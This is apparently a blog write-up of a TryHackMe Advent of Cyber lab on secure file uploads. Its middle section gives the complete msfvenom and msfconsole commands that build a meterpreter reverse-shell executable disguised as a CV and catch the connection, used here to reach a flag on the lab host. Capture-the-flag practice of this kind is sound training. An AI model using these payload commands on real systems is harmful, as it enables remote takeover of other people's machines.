Home THM Advent of Cyber - Day 15
Post
Cancel

THM Advent of Cyber - Day 15

Today’ we’ll be focusing on Secure Coding, and while the task will mostly be about reading there’s a little reverse shell example to be tested out.

Day 15

What is the name given to file uploads that allow threat actors to upload any files that they want?

We’re looking for a general term, and this can be found by simply reading the article on today’s vulnerability overview.

What is the title of the web application developed by Santa’s freelancer?

To find the answer here we simply need to fire up the target host and access http://$IP to see what the web app is called. It’s pretty close to the one shown in the sample on THM.

What is the value of the flag stored in the HR Elf’s Documents directory?

While the rest of the day is really straightforward, this part right here is the real meat and potatoes. What we’re going to need is a way to establish a reverse shell by exploiting the CV review workflow where a person would be executing the .exe file allowing us a way in. Obviously very unrealistic, but proves the concept well enough.

First we need to generate the exploit itself, and for that we can use the command msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=tun0 LPORT="4444" -f exe -o cv-username.exe on Kali. This generates us a small .exe file that will, when run, make a connection back to our machine. Note the LHOST and LPORT settings, adjust according to your environment.

Next we need to set up the listener, and we can use msfconsole for this. Using the quick command sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT '4444'; exploit" we can be up and running swiftly, and then we’ll just sit back and wait for the connection to be established.

Once the meterpreter connection is established we’re able to dig through the filesystem, and the flag can be found in the Documents directory of the HR_Elf user.

What defence technique can be implemented to ensure that specific file types can be uploaded?

Answer can be once again found in the article itself, and with the help of the asterisks it’s pretty easy to spot when considering that we’re being asked about specific file types.

What defence technique can be used to make sure the threat actor cannot recover their file again by simply using the file name?

Here we again keep on just reading the article to find the correct sub-heading.

What defence technique can be used to make sure malicious files that can hurt elves are not uploaded?

Like with the last two, the correct answer is a sub-heading in the article itself.

This post is licensed under CC BY 4.0 by the author.